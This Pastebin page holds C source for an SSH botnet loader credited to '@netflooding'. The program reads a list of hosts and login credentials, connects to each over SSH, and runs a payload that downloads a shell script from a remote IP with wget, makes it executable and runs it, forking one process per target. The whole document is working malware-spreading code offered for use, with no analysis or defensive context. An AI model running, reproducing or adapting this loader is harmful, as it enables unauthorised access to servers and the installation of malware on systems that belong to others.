Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /* made by @netflooding
- yum install libssh -y
- compile: gcc -o loader loader.c -lssh
- compile with debug: gcc -o loader loader.c -lssh -DDEBUG
- */
- #include <stdio.h>
- #include <ctype.h>
- #include <stdlib.h>
- #include <string.h>
- #include <sys/types.h>
- #include <libssh/libssh.h>
- char *payload = "wget http://1.1.1.1/bins.sh -O blade.sh && chmod 777 blade.sh; sh blade.sh";
- #define INFO "(\x1b[33m%s\x1b[37m)"
- #define ERROR "(\x1b[31m?\x1b[37m)"
- #define FAILED "(\x1b[31m%s\x1b[37m)"
- #define SUCCESS "(\x1b[32m+\x1b[37m)"
- void Trim(char *str)
- {
- int i;
- int begin = 0;
- int end = strlen(str) - 1;
- while (isspace(str[begin])) begin++;
- while ((end >= begin) && isspace(str[end])) end--;
- for (i = begin; i <= end; i++) str[i - begin] = str[i];
- str[i - begin] = '\0';
- }
- void free_channel(ssh_channel channel) {
- ssh_channel_send_eof(channel);
- ssh_channel_close(channel);
- ssh_channel_free(channel);
- }
- void free_session(ssh_session session) {
- ssh_disconnect(session);
- ssh_free(session);
- }
- void exploit(char *host, int port, char *username, char *password)
- {
- printf("(\x1b[33m!\x1b[37m) Attempting to exploit %s:%d\n", host, port);
- int rc;
- int statement = 0;
- char buffer[1024];
- ssh_session session;
- ssh_channel channel;
- unsigned int nbytes;
- start:
- switch(statement)
- {
- case 0:
- {
- #ifdef DEBUG
- printf(INFO" Creating secure shell session...\n", host);
- #endif
- session = ssh_new();
- if (session == NULL)
- {
- #ifdef DEBUG
- printf(FAILED" Failed to create secure shell session...\n", host);
- #endif
- goto end;
- }
- ssh_options_set(session, SSH_OPTIONS_HOST, host);
- ssh_options_set(session, SSH_OPTIONS_PORT, &port);
- #ifdef DEBUG
- printf(INFO" Setting username -> \x1b[34m%s\x1b[37m\n", host, username);
- #endif
- ssh_options_set(session, SSH_OPTIONS_USER, username);
- #ifdef DEBUG
- printf(INFO" Connecting...\n", host);
- #endif
- rc = ssh_connect(session);
- if (rc != SSH_OK)
- {
- #ifdef DEBUG
- printf(FAILED" Failed to connect to host...\n", host);
- #endif
- goto end;
- }
- #ifdef DEBUG
- printf(INFO" Sending password -> \x1b[35m%s\x1b[37m\n", host, password);
- #endif
- rc = ssh_userauth_password(session, NULL, password);
- if (rc != SSH_AUTH_SUCCESS)
- {
- #ifdef DEBUG
- printf(FAILED" Incorrect credentials...\n", host);
- #endif
- goto end;
- }
- channel = ssh_channel_new(session);
- if (channel == NULL) exit(-1);
- #ifdef DEBUG
- printf(INFO" Opening shell...\n", host);
- #endif
- rc = ssh_channel_open_session(channel);
- if (rc != SSH_OK)
- {
- #ifdef DEBUG
- printf(FAILED" Failed to open shell...\n", host);
- #endif
- goto end;
- }
- #ifdef DEBUG
- printf(INFO" Sending payload...\n", host);
- #endif
- char cmd[60];
- snprintf(cmd, sizeof(cmd), "%s; echo 'ssh_sent_payload'", payload);
- rc = ssh_channel_request_exec(channel, cmd);
- if(rc != SSH_OK)
- {
- #ifdef DEBUG
- printf(FAILED" Failed to send payload...\n", host);
- #endif
- goto end;
- }
- sleep(0.6);
- nbytes = ssh_channel_read(channel, buffer, sizeof(buffer), 0);
- while (nbytes > 0)
- {
- if(strstr(buffer, "ssh_sent_payload"))
- {
- printf("(\x1b[32m%s\x1b[37m) Sent payload!\n", host);
- break;
- }
- nbytes = ssh_channel_read(channel, buffer, sizeof(buffer), 0);
- }
- }
- break;
- }
- end:
- free_channel(channel);
- free_session(session);
- return;
- }
- int main(int argc, char **argv)
- {
- char buf[512];
- if(argc > 2 || argc < 2)
- {
- printf(ERROR" Usage: %s <list>\n", argv[0]);
- exit(0);
- }
- FILE *srvlist = fopen(argv[1], "r");
- if(srvlist == NULL)
- {
- printf("[\x1b[31m-\x1b[37m] Failed to open given list (\x1b[33m%s\x1b[37m)\n", argv[1]);
- exit(0);
- }
- while(fgets(buf, sizeof(buf) - 1, srvlist))
- {
- if(strlen(buf) < 3 || buf == NULL)
- break;
- Trim(buf);
- char *conn = strtok(buf, " ");
- char details[100];
- snprintf(details, sizeof(details), "%s", conn+strlen(conn)+1);
- char *ip = strtok(conn, ":");
- int port = atoi(ip+strlen(ip)+1);
- char *user = strtok(details, ":");
- char pass[30];
- snprintf(pass, sizeof(pass), "%s", user+strlen(user)+1);
- if(!(fork()))
- {
- exploit(ip, port, user, pass);
- exit(0);
- }
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement